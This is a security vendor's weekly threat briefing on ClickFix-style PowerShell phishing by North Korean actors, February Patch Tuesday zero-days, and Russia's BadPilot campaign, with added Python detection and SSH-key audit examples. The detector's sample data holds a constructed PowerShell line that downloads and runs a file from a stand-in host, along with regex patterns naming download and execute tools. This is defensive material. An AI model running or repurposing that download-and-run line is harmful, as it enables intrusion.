Threat Briefing — Feb 14, 2025

Weekly Threat Briefing - Feb 10 - Feb 14

TLP: CLEAR - This information may be shared publicly

eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.

Noteworthy News

North Korean Threat Actors using Phishing Techniques to Execute PowerShell Commands

Bottom Line: North Korean threat actors are using a phishing technique similar to the ClickFix initial access vector, which uses social engineering to convince victims to execute malicious PowerShell code.

On February 11th, the Microsoft Threat Intelligence team reported a new phishing tactic used by the North Korean state-sponsored threat group Emerald Sleet.

Emerald Sleet, also known as Kimsuky, Velvet Chollima, Black Banshee, and THALLIUM, is a North Korean state-sponsored cyber espionage group active since at least 2012. Initially focused on South Korean government agencies, think tanks, and subject-matter experts in various sectors, the group has since broadened its scope to include organizations in the United States, Japan, Russia, and Europe. Emerald Sleet has a history of targeting defense-related organizations, using tactics such as offering fake job opportunities to employees and luring them into revealing sensitive information.

In a recent phishing campaign, the attackers impersonated South Korean government officials. After establishing trust and rapport with their targets, the threat actors sent spear-phishing emails that included a PDF attachment and a URL. The email instructed the victim to click the URL to register their device in order to access the provided documents. The instructions then prompted the victim to open PowerShell as an administrator and paste the provided malicious code. If run as administrator, the code downloaded and installed a browser-based remote desktop tool and a certificate file containing a hardcoded PIN from a remote server. The code then sent a web request to a remote server and registered the victim's device using the downloaded certificate and PIN. The device registration allowed the attackers to access the victim's device and exfiltrate data.

Microsoft reported observing the tactic in limited attacks since January 2025. The attack described follows an approach similar to the ClickFix initial access vector, where the victim is manipulated into executing malicious commands. Another North Korean threat actor linked to the Contagious Interview campaign used a similar strategy, where victims were prompted to copy, paste, and execute malicious commands on their Apple macOS systems. These commands were disguised as fixes for camera or microphone issues during the interview.

eSentire Threat Intelligence Analysis:

Although this social engineering tactic has so far been observed in only a limited number of attacks, its use, along with other ClickFix-style schemes in which users execute malicious commands or scripts on their own systems, is expected to persist in 2025. This manipulation tactic enables attackers to gain access to victim devices with minimal suspicion, making it an appealing initial access method for cybercriminals.

Various threat actors deliver the ClickFix technique via compromised websites, documents, HTML attachments, malicious URLs, and other methods. eSentire has noted a significant increase in ClickFix attacks in recent months, where the tactic was used to distribute information-stealing malware and remote access tools such as Lumma Stealer, Vidar Stealer, NetSupport Manager RAT, and more. To mitigate ClickFix and similar threats, it is recommended to disable the Windows Run box to prevent users from running malicious PowerShell code. Organizations should implement Endpoint Detection and Response (EDR) tools to monitor suspicious PowerShell activity and the deployment of malicious files. Organizations should also conduct User Awareness Training to help users recognize and report phishing attacks effectively.
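As an added illustration (not eSentire's detection logic and not code from the Microsoft report), the following Python scores constructed PowerShell events for the ClickFix pattern described above: an elevated console the user opened interactively, whose pasted script downloads a file, executes it, and registers with a remote server. The event field names and indicator lists are assumptions.

```python
import re

# Constructed events modelled loosely on Sysmon process creation (parent, image,
# integrity level) joined with PowerShell script-block logging (script text).
# The field names are an assumption, not a real log schema.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe", "integrity": "High",
     "script": "Invoke-WebRequest 'https://example.invalid/rd.exe' -OutFile $env:TEMP\\rd.exe; "
               "Invoke-WebRequest 'https://example.invalid/dev.pem' -OutFile $env:TEMP\\dev.pem; "
               "Start-Process $env:TEMP\\rd.exe; "
               "Invoke-RestMethod 'https://example.invalid/register' -Method Post -Certificate $cert"},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe", "integrity": "Medium",
     "script": "Get-ChildItem -Path C:\\Users\\alice\\Documents -Recurse"},
    {"id": 3, "parent": "services.exe", "image": "powershell.exe", "integrity": "System",
     "script": "Invoke-WebRequest 'https://updates.example.invalid/agent.msi' -OutFile C:\\Temp\\agent.msi"},
]

# Indicator lists are assumptions chosen to match the behaviour described in the briefing.
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile|\bcurl\b|\bwget\b", re.I)
EXECUTE = re.compile(r"start-process|invoke-expression|\biex\b|\bmsiexec\b|\.exe\b", re.I)
REGISTER = re.compile(r"\bregister|\.pem\b|\.pfx\b|certificate|\bpin\b", re.I)

def score(event):
    """Return the list of ClickFix indicators present in one event."""
    reasons = []
    if event["parent"].lower() == "explorer.exe" and event["image"].lower() == "powershell.exe":
        reasons.append("console opened interactively by the user (Run box / Start menu)")
    if event["integrity"] in ("High", "System"):
        reasons.append("elevated console")
    script = event["script"]
    if DOWNLOAD.search(script):
        reasons.append("downloads remote content")
    if EXECUTE.search(script):
        reasons.append("executes a downloaded file")
    if REGISTER.search(script):
        reasons.append("certificate / device-registration keywords")
    return reasons

def flag_clickfix(events, threshold=4):
    """Return (event id, reasons) for events carrying at least `threshold` indicators."""
    flagged = []
    for event in events:
        reasons = score(event)
        if len(reasons) >= threshold:
            flagged.append((event["id"], reasons))
    return flagged

if __name__ == "__main__":
    for event_id, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"event {event_id}: " + "; ".join(reasons))
```

Event 3 (a service-launched download with no execution or registration) stays below the threshold, which is the point of scoring several indicators together rather than alerting on every download cradle.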

The eSentire Threat Intelligence team is tracking emerging initial access tactics such as ClickFix. eSentire's Threat Response Unit (TRU) has published the following articles on ClickFix: Lumma Stealer ClickFix Distribution, Lumma Stealer Malware Updated to Use ChaCha20 Cipher for Config Decryption, and NetSupport RAT Clickfix Distribution.

Microsoft Patch Tuesday

Bottom Line: This month, Microsoft highlighted two vulnerabilities confirmed to be actively exploited by threat actors and two vulnerabilities that were disclosed prior to patch release. Organizations are strongly recommended to review the full Microsoft release and apply all relevant security patches.

On February 11th, Microsoft released their monthly Patch Tuesday vulnerability disclosure, which included a total of 55 vulnerabilities. The patches address two zero-day vulnerabilities that have been observed being actively exploited and two publicly disclosed vulnerabilities, one of which Microsoft has listed as exploitation “more likely”.

The confirmed exploited vulnerabilities are CVE-2025-21418 and CVE-2025-21391. CVE-2025-21418 (CVSS: 7.8) is described as a Windows Ancillary Function Driver Elevation of Privilege vulnerability. A threat actor with previously established access to a vulnerable device could exploit the vulnerability to obtain system privileges. Multiple versions of Windows Server, Windows 10, and Windows 11 are impacted.

CVE-2025-21391 (CVSS: 7.1) is a Windows Elevation of Privilege vulnerability. Similar to the previously mentioned zero-day vulnerability, exploitation of CVE-2025-21391 would lead to increased privileges on the compromised device; threat actors would be able to delete targeted files on a system, potentially leading to services being unavailable. Microsoft has not shared any details on real-world attacks involving either vulnerability.

Microsoft states that two vulnerabilities from the February Patch Tuesday release were disclosed prior to patch release but have not yet been exploited by threat actors. CVE-2025-21194 (CVSS: 7.1) is a Surface Security Feature Bypass vulnerability. Successful exploitation would enable a threat actor with previously established access to a network to bypass the Unified Extensible Firmware Interface (UEFI) and potentially compromise the hypervisor and secure kernel. CVE-2025-21377 (CVSS: 6.5) is a Hash Disclosure Spoofing vulnerability, which may allow threat actors to steal a user’s NTLMv2 hash, allowing them to authenticate as the user. Microsoft states that this vulnerability is “more likely” to be exploited in real-world attacks.

eSentire Threat Intelligence Analysis:

Organizations are strongly encouraged to apply all relevant security patches released by Microsoft as part of their February Patch Tuesday disclosure. Zero-day vulnerabilities, vulnerabilities listed as exploitation more likely, and vulnerabilities in Internet-facing applications should be prioritized for immediate patching.

The 55 vulnerabilities from this release show a significant decrease from the January disclosure. Microsoft’s January Patch Tuesday release included 161 total vulnerabilities, eight of which were exploited as zero-days. February marks Microsoft’s lowest patch release since June 2024.

The eSentire Threat Intelligence team is actively tracking the vulnerabilities from this release for additional details and detection opportunities. Microsoft has not disclosed which researchers or organizations reported the zero-day vulnerabilities from the February release; as such, it is unclear when additional details or technical reports for the vulnerabilities will be made available. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify devices vulnerable to the recently disclosed zero-day vulnerabilities.

The BadPilot Campaign

Bottom Line: Microsoft revealed details on a multi-year initial access campaign attributed to the Russian state-sponsored APT Seashell Blizzard, who were observed exploiting known vulnerabilities in Internet-facing assets to gain access to victim networks and establish persistence on compromised hosts for espionage purposes.

On February 12th, Microsoft disclosed a multi-year initial access campaign attributed to a subgroup operating within the known APT group Seashell Blizzard (Sandworm, BlackEnergy, APT44). This campaign is being tracked under the name BadPilot. Seashell Blizzard is a highly sophisticated Russian state-sponsored APT that has operated since at least 2009.

The BadPilot campaign has been ongoing since at least 2021 and has impacted organizations in the United States, Canada, Australia, and the United Kingdom. The Seashell Blizzard subgroup is specifically dedicated to gaining initial access into victim organizations and establishing persistence. These persistence mechanisms allow the primary Seashell Blizzard operators to access victim organizations at a later date. For initial access, the group exploits vulnerabilities in Internet-facing assets. According to Microsoft, vulnerabilities in Microsoft Exchange, Zimbra Collaboration, OpenFire, JetBrains TeamCity, Microsoft Outlook, ConnectWise ScreenConnect, Fortinet FortiClient EMS, and JBoss have all been targeted.

Once access is established, a variety of means are employed to maintain access to the device. These include the deployment of Remote Management and Monitoring (RMM) tools such as the Atera Agent, the use of OpenSSH with a unique public key, and the deployment of webshells. Additionally, Microsoft identified a previously unseen persistence mechanism dubbed ShadowLink. ShadowLink is a custom utility that registers compromised systems as Tor hidden services, enabling continuous access and stealthy Command-and-Control (C2). Microsoft has not shared information on how Seashell Blizzard acts on the infections established by the subgroup.
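One way to surface the OpenSSH persistence mentioned above is to audit authorized_keys files for keys whose fingerprints are not on a change-controlled approved list. This is an added example, not code from the Microsoft report or from eSentire's tooling; the sample file and its key blobs are constructed, and the approved set is an assumption.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com")

# Constructed sample file; the blobs are well-formed base64 but are not real keys.
SAMPLE_AUTHORIZED_KEYS = """\
# approved administrator key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGxvB2tzbGlrZWFyZWFsZWQyNTUxOWtleWJ1dGlzbnQA alice@admin-ws
# key added without change control, with no comment identifying an owner
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHVua25vd25rZXlpbnNlcnRlZGJ5YXR0YWNrZXIxMgAA
"""

def parse_authorized_keys(text):
    """Yield (key_type, blob, comment, line_no) for each key line.
    Leading options (e.g. command="...") are skipped; assumes they contain no whitespace."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue
        yield tokens[idx], tokens[idx + 1], " ".join(tokens[idx + 2:]), n

def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (the form ssh-keygen -lf prints)."""
    padded = blob + "=" * (-len(blob) % 4)  # tolerate blobs stored without padding
    digest = hashlib.sha256(base64.b64decode(padded)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def audit_authorized_keys(text, approved):
    """Return (line_no, fingerprint, comment) for every key not in the approved set."""
    return [(n, fp, comment) for _, blob, comment, n in parse_authorized_keys(text)
            if (fp := fingerprint(blob)) not in approved]

if __name__ == "__main__":
    # Assumption: in practice the approved set comes from change-control records.
    approved = {fingerprint("AAAAC3NzaC1lZDI1NTE5AAAAIGxvB2tzbGlrZWFyZWFsZWQyNTUxOWtleWJ1dGlzbnQA")}
    for n, fp, comment in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, approved):
        print(f"line {n}: unapproved key {fp} comment={comment!r}")
```

Run the same audit across every user's authorized_keys (and the system-wide AuthorizedKeysFile locations) so that a key dropped into a service account is caught as readily as one in an interactive user's home directory.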

eSentire Threat Intelligence Analysis:

Seashell Blizzard is directly attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455. From 2021-2023, the group’s activity was focused on “Ukraine, Europe, and specific verticals in Central and South Asia, and the Middle East”. Starting in early 2024, Seashell Blizzard shifted their targeting to the United States, Canada, Australia, and the United Kingdom. This change is notable, as it indicates shifting Russian strategic priorities towards members of the Five-Eyes intelligence alliance.

Microsoft describes Seashell Blizzard as “Russia’s cyber tip of the spear in Ukraine”. The subgroup described in this report compromises organizations that are, or may become, relevant to Russian strategic goals, enabling future access by the broader Seashell Blizzard group. While the specific goals of compromise have not been identified or disclosed at this time, Seashell Blizzard has previously carried out a wide variety of sophisticated attacks. These include information theft for strategic advantage, supply chain attacks to spread compromises, and destructive attacks involving both wiper malware and the manipulation of Industrial Control Systems (ICS). As the Seashell Blizzard initial access subgroup appears to compromise victims in Five-Eyes countries opportunistically, it is possible that there is no specific goal for each infection at this time. In this scenario, compromised organizations would be reviewed and evaluated for their potential strategic value by the primary group. Because persistence is already established, compromised organizations can be rapidly actioned at a future date.

As Seashell Blizzard is a highly active, long-established, and sophisticated group, similar activity should be expected throughout 2025. It is almost certain that the group will continue to develop novel tools and attacks. In response to the disclosure of the BadPilot campaign, eSentire’s Threat Response Unit (TRU) is performing threat hunts across the client base. Additionally, known related IP addresses are blocked via the eSentire Global Block list. The eSentire product suite maintains a variety of detections for known Seashell Blizzard tools, including publicly available tools used by the group such as Cobalt Strike and the DarkCrystal (DC) RAT. eSentire Managed Vulnerability Service (MVS) has plugins in place to identify all of the vulnerabilities listed in this report. The TRU team at eSentire continues to research this topic for additional details and detection opportunities.

About the threat briefings:

The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.

eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.
